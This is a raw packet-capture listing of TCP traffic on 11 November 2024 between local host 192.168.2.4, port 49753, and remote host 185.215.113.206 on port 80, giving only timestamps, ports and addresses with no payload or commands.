                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710887909 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710907936 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710920095 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710930109 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710932016 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710946083 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710948944 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710958958 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710971117 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710971117 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710983992 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710993052 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.710998058 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711010933 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711019993 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711025000 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711031914 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711038113 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711050987 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711059093 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711066008 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711080074 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711086035 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711092949 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711097956 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711107016 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711121082 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711133003 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711137056 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711147070 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711153984 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711159945 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711170912 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711174965 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711196899 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711225033 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711520910 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711534023 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711545944 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711559057 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711566925 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711571932 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711581945 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711585999 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711602926 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711606979 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711617947 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711626053 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711631060 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711644888 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711652994 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711657047 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711671114 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711683035 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711693048 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711694956 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711699009 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711711884 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711719990 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711725950 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711745024 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711746931 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711759090 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711771011 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711771011 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711783886 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711790085 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711806059 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711813927 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711821079 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711833954 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711843014 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711847067 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711860895 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711872101 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711874962 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711884022 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711890936 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711905956 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711918116 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711920977 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711930990 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711935043 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711945057 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711947918 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.711975098 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712744951 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712764978 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712775946 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712788105 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712793112 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712800980 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712812901 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712816000 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712826014 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712837934 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712841988 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712852001 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712852001 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712866068 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712874889 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712879896 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712892056 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712902069 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712905884 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712917089 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712919950 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712933064 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712941885 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712945938 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712959051 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712965965 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712973118 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712980986 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.712985992 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713001013 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713011980 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713011980 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713028908 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713043928 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713155985 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713170052 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713180065 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713191032 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713191032 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713205099 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713207960 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713217020 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713224888 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713237047 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713248014 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713254929 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713259935 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713273048 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713274956 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713287115 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713306904 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713308096 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713320017 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713324070 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713334084 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713346958 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713346958 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713361025 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713371992 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713377953 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713403940 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713407993 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713422060 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713424921 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713435888 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713438988 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713449955 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713457108 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713464975 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713468075 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713478088 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713481903 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713490963 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713500977 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713505983 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713514090 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713519096 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713527918 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713532925 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713543892 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713547945 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713557005 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713562965 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713572025 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713577032 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713587046 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713589907 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713598013 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713615894 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.713627100 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.714957952 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.714972019 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.714986086 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.714998960 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715009928 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715019941 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715023041 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715042114 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715043068 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715055943 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715059996 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715069056 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715090036 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715092897 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715092897 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715105057 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715107918 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715118885 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715126991 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715132952 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715136051 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715147018 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715158939 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715162039 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715169907 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715173960 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715181112 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715187073 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715193987 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715200901 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715209007 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715217113 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715223074 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715235949 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715246916 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715255022 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715281963 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715461969 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715476036 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715487957 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715502024 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715509892 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715513945 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715523005 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715532064 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715543032 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715548992 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715570927 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715640068 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715652943 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715663910 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715677023 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715678930 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715689898 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715698957 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715703011 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715718985 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715728998 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715730906 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715739012 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715750933 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715761900 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715763092 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715778112 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715784073 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715790987 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715796947 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715805054 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715811968 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715818882 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715823889 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715833902 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715840101 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715847015 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715854883 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715859890 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715867996 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715874910 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715882063 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715888977 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715902090 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.715905905 CET4975380192.168.2.4185.215.113.206
